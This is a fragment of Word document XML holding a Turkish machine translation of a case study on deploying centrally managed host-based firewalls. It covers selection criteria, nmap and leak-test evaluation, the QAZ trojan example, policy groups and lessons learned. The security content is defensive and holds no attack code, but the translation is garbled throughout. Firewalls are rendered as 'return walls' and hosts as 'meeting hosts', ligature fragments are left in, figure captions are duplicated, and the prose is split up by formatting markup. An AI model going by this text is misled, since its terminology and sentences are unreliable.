          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İşletme Genelinde Ana Bilgisayar Tabanlı Güvenlik Duvarlarını Dağıtma: Bir Durum Çalışması</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Toplantı sahipleri çeşitli tehditlere maruz kaldıklarından, kuruluşların kuruluş genelinde ana bilgisayar tabanlı güvenlik duvarları dağıtma gereksinimi artmaktadır. Bu bölüm, bir ana bilgisayar tabanlı güvenlik duvarının ideal özelliklerini - tipik olarak gerekmeyen veya tamamen bulunmayan özellikler - içermektedir.  kişiye özel   owned Özel bir PC'de duvar yazılımı uygulaması. Buna ek olarak, yazar bir kuruluş genelinde acenta tabanlı, ana bilgisayar tabanlı duvarları dağıtma konusundaki deneyimlerini ve bunlardan edinilen dersleri açıklar. Yazar, sunucu tabanlı güvenlik duvarlarının değerli bir ek güvenlik katmanı sağladığı sonucuna varmıştı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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SEMANTİK BİR GİRİŞ </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 Kişisel duvarlar genellikle “her zaman açık” genişbant İnternet bağlantılarına bağlı ev bilgisayarları ile ilişkilendirilir (ve bunun için tasarlandı). Gerçekten, terim  kişisel güvenlik duvarı   kendisi, ürünün tarihinin bir parçası: aslında  kuruluş   fi rewalls,  kişiye özel  ﬁ duvarlar başlangıçta ev bilgisayarlarını korumanın bir yolu olarak görülüyordu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>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Zamanla, kişisel duvarların başka kullanımları olduğu da kabul edildi. Güvenlik topluluğu, İnternet üzerinden kurumsal LAN'a bağlanan dizüstü bilgisayarları korumak ve kişisel olarak kurumsal LAN'da bulunan dizüstü bilgisayarları korumak için kişisel duvarları kullanmaktan bahsetmeye başladı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103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Bu eğilim ile tutarlı olarak - ve derinlemesine savunma ilkesine uygun olarak - kişisel duvarların potansiyel kullanımının bir kez daha genişletilmesi için zaman geldiği söylenebilir. Kişisel duvarlar gerçekten şu şekilde görülmeli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103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Pr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> host tabanlı  fi rewalls. Ana bilgisayar tabanlı ve ağ tabanlı ağ duvarları arasında ayrım yapıldığında, ana bilgisayar tabanlı ağ duvarının ek kullanımı belirginleşir. Tıpkı kuruluşların ana bilgisayar tabanlı konuşlandırması gibi  Saldırı Tespit Sistemleri (IDS) kritik sunucular için ek bir algılama özelliği sağlamak için, kuruluşların ana bilgisayar tabanlı konuşlandırmayı düşünmeleri gerekir. fi rewalls  kritik sunucular için ek bir erişim kontrolü katmanı sağlamak (örneğin, değişim sunucuları, etki alanı denetleyicileri, baskı sunucuları vb.). Nitekim, çoğu ana bilgisayar tabanlı ağ topluluğunun yerleşik bir IDS özelliğine sahip </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olması nedeniyle, en azından bazı küçük kuruluşlar için ana bilgisayar tabanlı ağ duvarlarının bile değiştirmek  uzman ana bilgisayar tabanlı IDS yazılımı.</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ab/>
        <w:t>Bir duvarın diğerinin arkasına yerleştirilmesi fikri yeni değildir. Yıllar boyunca, güvenlik uzmanları özellikle hassas arka sistemleri korumak için iç duvarlar denilen hakkında konuşmuşlar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2)Ancak, genel olarak ağ tabanlı güvenlik duvarları gibi dahili güvenlik duvarları hala özel aygıtlardır. (Bu, hem Cisco’nun PIX gibi güvenlik duvarı cihazları ve hem de Symantec’in Raptor'u gibi yazılım tabanlı “geri dönüş duvarları” için geçerlidir.) Buna karşılık, ana bilgisayar tabanlı “geri dönüşler” fazladan ekipman gerektirmez. Ana bilgisayar tabanlı bir güvenlik duvarı, önceden var olan bir sunucuda veya istemci makinede çalışan bir güvenlik duvarı yazılımıdır. Bir ana bilgisayar tabanlı güvenlik duvarının bir sunucuda veya istemci makinede çalıştığı göz önüne alındığında (vE Sadece bu makine), ana bilgisayar tabanlı duvarlar, tek bir makineyi korumaya adanmış iç duvarlar dahil olmak üzere, ağ tabanlı duvarlardan daha fazla işlevsellik sunar. Hem ağ hem de ana bilgisayar tabanlı ﬁ geri dönüş duvarları, gelen ve giden ağ bağlantılarını ability ltre etme yeteneğine sahipken, yalnızca ana bilgisayar tabanlı ﬁ geri alma duvarları ek  belirli programlara bağlı ağ bağlantılarını engelleme ve posta eklerinin yürütülmesini önleme yetenekle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Bunu doğru bir perspektife sokmak için, Microsoft’un dahili ağına yapılan Kasım 2000 saldırısında kullanılan istismar olduğundan şüphelenilen ağ kurdu ve Truva atı programı QAZ’yı düşünün. QAZ, NOTEPAD.EXE programını kaçırarak çalışır. Son kullanıcının bakış açısından, Notepad hala normal çalışıyor gibi görünüyor; ancak Notepad başlatıldığında, QAZ, Çin'deki bir adrese (virüslü makinenin IP adresini içeren) bir e-posta iletisi gönderir.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3)  Bu arada, arka planda, Truva atı, davetsiz misafirin herhangi bir uygulamayı yükleyip yürütebileceği, 7597 numaralı TCP bağlantı noktasında bir bağlantı için sabırla bekler.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4 ) QAZ'ın bunun yerine TCP bağlantı noktası 80 üzerinden çalışacak şekilde değiştirildiğini varsayalım.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 xml:space="preserve">5) Tüm duvarlar TCP bağlantı noktası 80'deki giden bağlantıları engelleyebilse de, böyle bir yapılandırmanın uygulanması meşru trafiğe müdahale edecektir. Yalnızca ana bilgisayar tabanlı bir güvenlik duvarı, NOTEPAD.EXE ile ilişkili TCP bağlantı noktası 80 üzerindeki bir bağlantıyı engelleyebilir ve olayı kullanıcıya bildirir. Steve Riley'in dediği gibi, “Kişisel ödevler       giden bağlantıları izlemenin bir uyarı vereceğini; 'Not Defteri, İnternet’e bağlanmaya çalışıyor' bildirimini içeren bir iletişim kutusu görerek, kimsenin şüphelerini uyandırmalıdır. ”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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6)</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>STAND-ALONE VERSUS FİRMASINA AİT YANGIN DUVARLAR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na bilgisayar tabanlı geri duvarlar iki kategoriye ayrılabilir: tek başına ve aracı tabanl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7)Tek başına ﬁ duvarlar, konfigürasyonlarının yönetildiği (ve günlükleri) makinenin kendisinde saklandığı için diğer ağ cihazlarından bağımsızdır. Tek başına ew geri dönüş duvarlarına örnek olarak ZoneAlarm, Sygate Personal Firewall Pro, Network Associates’in PGP Masaüstü Güvenliği, McAfee Personal Firewall,</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lastRenderedPageBreak/>
        <w:t>  8)Norton Internet Security 2000 ve Symantec Desktop Firewall. Buna karşılık, ajan bazlı duvarlar yerel olarak yapılandırılmamakta veya izlenmemektedir. Temsilci tabanlı güvenlik duvarları, merkezi bir işletme sunucusundan yapılandırılır (ve kayıtları kopyalanır). Temsilci tabanlı ew geri dönüş duvarlarına örnek olarak ISS RealSecure Desktop Protector (daha önce Network ICE’nin Black ICE Defender'ı) ve InfoExpress’in CyberArmor Kişisel Güvenlik Duvarı verilebilir. Ana bilgisayarlarımıza ajan tabanlı güvenlik duvarı yazılımı uygulamayı seçtik. Tek başına geri duvarlar genellikle bir kurumsal çözüm olarak dağıtılırken, aracı tabanlı yeteneklerin kurum genelinde tutarlı bir erişim kontrol listesi (ACL) merkezi olarak yönetmesini ve uygulanmasını istedik. Ve en iyi uygulama, ağ tabanlı güvenlik duvarlarının günlüklerinin düzenli olarak gözden geçirilmesini gerektirdiğinden, kurum genelinde ana bilgisayar güvenlik duvarlarından gelen günlükleri düzenli inceleme ve analiz için tek bir kaynaktan toplayabilmeyi isted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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ÜRÜN SEÇİM KRİTERLERİMİZ</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 ajan tabanlı güvenlik duvarı modelini benimsediğimizde, bir sonraki adım bir ürün seçmek oldu. Yine, bu bölümün yazıldığı tarih itibariyle seçeneklerimiz RealSecure Desktop Protector veya CyberArmor idi. Bir ürün seçmek için aşağıdaki kriterleri kullandık:</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9) Atakları engellemede etkinlik.</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na bilgisayar tabanlı güvenlik duvarı, kötü amaçlı gelen trafiği engellemelidir. Ayrıca, en azından giden bağlantıları etkin bir şekilde filtreleme yeteneğine de sahip olmalıdır. Steve Gibson'ın dediği gibi, “İnternet bağlantılarımız sadece engellemekle kalmaz</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ış saldırı,ayrıca, güvenli bir şekilde yönetilmelerini sağlamalıdırla iç ekstrüzyon”</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10)Dahili ekstrüzyon yoluyla, Gibson, Truva atları, virüsler ve casus yazılımlar tarafından başlatılan giden bağlantılardan bahsediyor. Giden bağlantıları etkin bir şekilde filtrelemek için, ana bilgisayar tabanlı güvenlik duvarının şifreleme toplamlarını kullanması gerekir. Ana bilgisayar tabanlı güvenlik duvarı ilk önce her yetkili uygulama için şifreleme toplamları oluşturmalı ve daha sonra herhangi bir programdan önce (adın ne olursa olsun) erişime izin verilsin, bu toplamı veritabanında depolanan ile yeniden oluşturmalı ve karşılaştırmalıdır. Eğer uygulama  tüm yetkili uygulamalar için şifreleme toplamları veritabanını tutmaz (ve bunun yerine sadece adları veya dosya yollarını kontrol eder), ana bilgisayar tabanlı güvenlik duvarı bir kuruluşa yanlış bir güvenlik hissi verebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Merkezi konfigürasyon.</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adece ana bilgisayar tabanlı güvenlik duvarının yapılandırmasını merkezi olarak belirleme yeteneğine değil, aynı zamanda</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zorlamak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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u yapılandırma. Başka bir deyişle, son kullanıcıların hangi uygulamalara veya trafiğe izin verileceği konusunda güvenlik kararları almalarını önleme seçeneğindeyiz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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on kullanıcılara şeffaflı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on kullanıcılar herhangi bir yapılandırma kararı vermeyeceğinden, ürünün kendilerine mümkün olduğunca şeffaf olmasını istedik. Örneğin, kullanıcıların doğru politikayı uygulamak için dizüstü bilgisayarlarının nasıl bağlandığını (örneğin, kurumsal LAN, ev İnternet bağlantısı, VPN, extranet vb.) “Duvarına” söylemelerini istemedik. Bir saldırı olmadığında, duvarın arka planda sessizce performansı düşürmeden sessizce çalışmasını istedik. (Elbette, bir saldırı durumunda, kullanıcının bir uyarı almasını isteri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Çoklu platform desteğ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adece kişisel duvarlarla ilgileniyor olsaydık, bu endişe olmazdı. (Linux dizüstü bilgisayarlar kişisel güvenlik duvarı korumasına ihtiyaç duyabilir olsa da, ortamımızda bu tür makinelere sahip değiliz.) Ancak, sunucularımızda olduğu gibi istemci bilgisayarlarımızda da sunucu tabanlı ana duvarları uygulamakla ilgilendiğimiz için birden fazla işletim sistemi desteği bir gereksinim.</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Uygulama desteğ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üvenlik duvarı tüm yetkili uygulamalarla ve bu uygulamalar tarafından kullanılan protokollerle uyumlu olmalı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VPN desteğ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na bilgisayar tabanlı güvenlik duvarı VPN uygulamamızı ve istemci yazılımımızı desteklemelidir. Ayrıca, VPN bağlantılarını algılayabilmeli ve şeffaf bir şekilde adapte edebilmeli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üvenlik duvarı mimaris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Paket filtreleme, uygulama düzeyinde proxy ve durum denetimi dahil olmak üzere, ana bilgisayar tabanlı geri dönüş duvarları için birçok seçenek var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IDS teknolojis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ynı şekilde, her biri kendi güçlü ve zayıf yönleri olan IDS teknolojisine birkaç farklı yaklaşım vardır. Ana bilgisayar tabanlı bir güvenlik duvarı tarafından tespit edilebilecek saldırıların sayısı burada açıkça geçerli olacakt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Kullanım ve montaj kolaylığ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irişimci bir çözüm olarak, ürün uzaktan dağıtım ve kurulumu desteklemelidir. Ek olarak, merkezi yönetim sunucusunun (göreceli) kullanımı ve yapılandırılması kolay olmalı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Teknik Deste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alite ve bulunabilirlik bizim için önemli olanlardı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Ölçeklenebilirl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Küçük bir şirket olsak da, büyümeyi bekliyoruz. Çok sayıda ajanı destekleyebilecek sağlam bir ürüne ihtiyacımız v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isk alan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on kullanıcı makinelerinde gereken disk alanı miktarının yanı sıra merkezi politika ve günlük sunucusu konusunda endişeliydik. Örneğin, ﬁ rewall kaç kez sayıyo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Her saldırı için tek bir olayı günlüğe kaydetmek yerine bir saldırı mı gerçekleşiyo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Birden fazla politika grubu.</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er biri farklı ihtiyaçlara sahip farklı son kullanıcı gruplarımız olduğundan, farklı gruplar üzerinde farklı politikalar uygulama esnekliğini istedik. Örneğin, çalışanlarımızın geri kalanı için böyle bir trafiği reddederken, SQLNet trafiğini geliştirme masaüstlerimizden izin vermek isteyebiliri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Raporla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enzer kurumsal çözümlerde olduğu gibi, ideal bir raporlama özelliği de, belirli bir süre zarfında en fazla davetsiz misafirlere yönelik dahili raporları, hedefleri ve saldırı yöntemlerini (örneğin, aylık, haftalık vb.) İçerecekt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Maliyet.</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Göreceli olarak küçük bir kuruluş olarak, özellikle yüksek kaliteli bir işletme çözümü seçmenin maliyeti konusunda endişeliyd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TEST METODOLOJİMİZ</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onunda, küçük ve temsili bir kullanıcı örneği ile her üründe pilot bir çalışma yaparak hem CyberArmor hem de RealSecure Desktop Protector'ı kurmayı ve değerlendirmeyi planlıyoruz. (Bu bölüm yazıldığı sırada, CyberArmor'un değerlendirmesine ve ISS Real Secure'ın pilot çalışmasına başlamak üzereyiz.) Her iki ürünü de ölçütlerimizin çoğuna göre değerlendirme yöntemi açıkken, bir kriteri test etmek detaylı bir açıklamayı hak ediyor: saldırıların engellenmesinde etkinlik. Her ürünün yetkisiz bağlantıları engellemedeki etkinliğini birkaç yolla test etti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ackYourself.com'dan Uzaktan Hızlı Tara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Bir çevirmeli bağlantıdan, basit ve uzak bir TCP ve UDP bağlantı noktası taramasını tek bir IP adresine karşı yürütmek için HackYourself.com’un Hızlı Taramasını kullandık.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Nmap taramas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ki farklı tarama yapmak için nmap kullandık. Öncelikle, güvenlik duvarının durum denetlemesi veya basit bir paket filtresi yapıp yapmadığını belirlemek için bir ACK taraması yaptık. İkinci olarak, ana bilgisayar tabanlı güvenlik duvarının hedef makinelere baskı yapma girişimlerini etkili bir şekilde engelleyip engellemediğini belirlemek için nmap işletim sistemi “ngerp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rinting” özelliğini kullandık. </w:t>
      </w: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Güvenlik duvarı, güvenilen uygulamanın, kötü amaçlı DLL'nin etkisine bağlı olarak uzaktaki bir makineye küçük bir metin mesajı göndermesini sağlar. Mesaj şu anda oturum açmış olan kullanıcının adını, bilgisayarın adını ve güvenlik duvarı ve mesajın gönderildiği saatte zafer kazandığını iddia eden bir mesaj içeriyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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YAPILANDIRM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 Ana bilgisayar tabanlı güvenlik duvarlarını dağıtma nedenlerimizden biri, Truva atlarına, casus yazılımlara ve giden ağ bağlantılarını başlatan diğer programlara karşı ek bir koruma katmanı sağlamaktı. Ana bilgisayar tabanlı ağ duvarları ağ bağlantısı göndermeyen veya almayan Truva atlarına müdahale etmek için tasarlanmamış olsa da, doğru şekilde yapılandırıldığında, yetkisiz uygulamalardan ağ trafiğini engellemede oldukça etkili </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olabilirler. Aslında, bir anlamda, ana bilgisayar tabanlı güvenlik duvarları virüsten koruma yazılımlarına göre bir avantaja sahiptir. Anti-virüs yazılımı yalnızca bilinen bir eşleşerek eşleşen Truva atlarını tespit ed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imza</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 ana bilgisayar tabanlı ﬁ ödüllendirmeler ağlarına bağlı olarak Truva atlarını tespit edebil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davranış</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 Ana bilgisayar tabanlı geri duvarlar, bağlantıyı TCP 80 gibi iyi bilinen bir bağlantı noktasında olsa bile veya bağlantıya neden olan uygulama meşru görünse bile (NOTEPAD), giden bağlantı başlatmaya çalışan herhangi bir yetkisiz uygulamayı tespit edebilir, engelleyebilir ve hatta sonlandırabilir. EXE). Bununla birlikte, Truva atlarını engellemek için ana bilgisayar tabanlı bir duvarı yapılandırmak için iyi bilinen iki uyarı vardır. Öncelikle, güvenlik duvarı yeni uygulamalar tarafından başlatılan tüm bağlantıları engellemelid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varsayılan olarak</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 İkincisi, güvenlik duvarı, yeni bir uygulamanın giden trafiği başlatmasına izin verip vermemesi gerektiğinden, herhangi bir nedenle, güvenlik duvarı tarafından istendiğinde “evet” e tıklayan son kullanıcılar tarafından engellenmemelidir. Birlikte ele alındığında, bu iki uyarı, ana bilgisayar tabanlı duvar duvarlarının sahip olma maliyetinin hızla artmasına neden olabilir. Aslında, her iki uyarıyı da zaten uygulamış olan diğer şirketler, belirli bir başvuruyu yetkili kılmak isteyen kullanıcılardan çok sayıda yardım masası çağrısı yaptığını bildirmişti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Standart bir masaüstü imajımız olmadığı ve çok küçük bir yardım masası personelimiz olduğu göz önüne alındığında, pilot kullanıcılarımızı iki farklı politika grubuna ayırmaya karar verdik: pilot teknik teknolojisi ve teknik normal pilot normal (Bkz. Ek 10 1). İlk yapılandırma, kullanıcıların bir uygulamanın giden bağlantı başlatmasına izin verip vermemesine karar vermelerini sağladı. Bu yapılandırma yalnızca BT personelimizin masaüstünde gerçekleştirildi. Kullanıcı, bağlantıda istenen ağ bağlantısına izin verilip verilmeyeceğini seçmelidir. Kullanıcı bu seçimi yaptığında, ana bilgisayar tabanlı güvenlik duvarı bir sağlama toplamı oluşturur ve kullanıcının kararını yansıtan bir kural oluşturur. (CyberArmor'da ayarlanmış bir örnek kural için bkz. Ek 10-2.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EF56A0C" wp14:editId="57F22F17">
            <wp:extent cx="5897656" cy="3377902"/>
            <wp:effectExtent l="19050" t="0" r="7844" b="0"/>
            <wp:docPr id="4117" name="Resim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l="13123" t="24917" r="12319" b="17265"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5898734" cy="3378520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sergi 10-1. Siber Zırh politika grupları.</w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01057261" wp14:editId="4901B1BA">
            <wp:extent cx="5760720" cy="3240089"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="4118" name="Resim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5760720" cy="3240089"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Sergi 10-2. Siber Zırh'ta örnek kullanıcı tanımlı kural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DERSLER ÖĞRENİLDİ</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Her ne kadar bu bölüm bittiyse de, her iki ana bilgisayar tabanlı güvenlik duvarı ürünüyle ilgili pilot çalışmalarımızı henüz tamamlamamış olsak da, zaten</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ergi 10-1. CyberArmor politika grupları.</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ergi 10-2. CyberArmor'da örnek kullanıcı tanımlı kural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Ajan tabanlı, ev sahibi tabanlı şirket duvarları dağıtımı hakkında çeşitli dersler öğrendim. Bu dersler aşağıdaki gibi özetlenebilir. 1. Pilot çalışmamız, standart dışı ve gerçekten de yetkisiz bir ağ yapılandırmasına sahip bir dizüstü bilgisayarı belirledi. Standart bir masaüstü görüntüsünü zorlamayan küçük kuruluşlar için bu sürpriz olmamalıdır. 2. Farklı makinelere farklı politikalar uygulama yeteneği her şeyden önemlidir. Bu, giden ağ bağlantılarını kısıtlamak için ana bilgisayar tabanlı güvenlik duvarı deneyimimizden açıkça görüldü. Kullanıcılarımızı iki gruba ayırabiliriz, yapılandırma kararları almamıza izin verdiklerimiz ve vermeyeceğimiz kararlarla hem esneklik hem de güvenlik elde edebildik. 3. Ağ tabanlı izinsiz giriş tespit sistemlerinde olduğu gibi, deneyimimiz iyi hazırlanmış kural kümelerine duyulan ihtiyacı doğruladı. Yapılandırmamız, gelen NetBIOS trafiğini engelleyen bir kural içermektedir. Hem iç ağımızda hem de dış ağlarda bulunan NetBIOS trafiği miktarı göz önüne alındığında, önemli miktarda uyarı oluşturdu. Bu da, yalnızca uyarlanmış uyarı kurallarına duyulan ihtiyacın altını çizdi.</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xml:space="preserve">4. Yazar ağ tabanlı güvenlik duvarları uygularken bulduğu gibi, ana bilgisayar tabanlı güvenlik duvarı kural kümesi oluşturma ve sonra ayarlama süreci zaman alıcıdır. Bu, özellikle giden trafikte kısıtlamalar uygulamaya karar verirse (ve kullanıcıların veya kullanıcıların bir kısmının kendilerine ait karar kararları almalarına izin vermezse), bu durum geçerlidir; bir giden bağlantı başlatmak için. Bu hiçbir şekilde aşılmaz bir sorun olsa da, bu yapılandırmaya </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
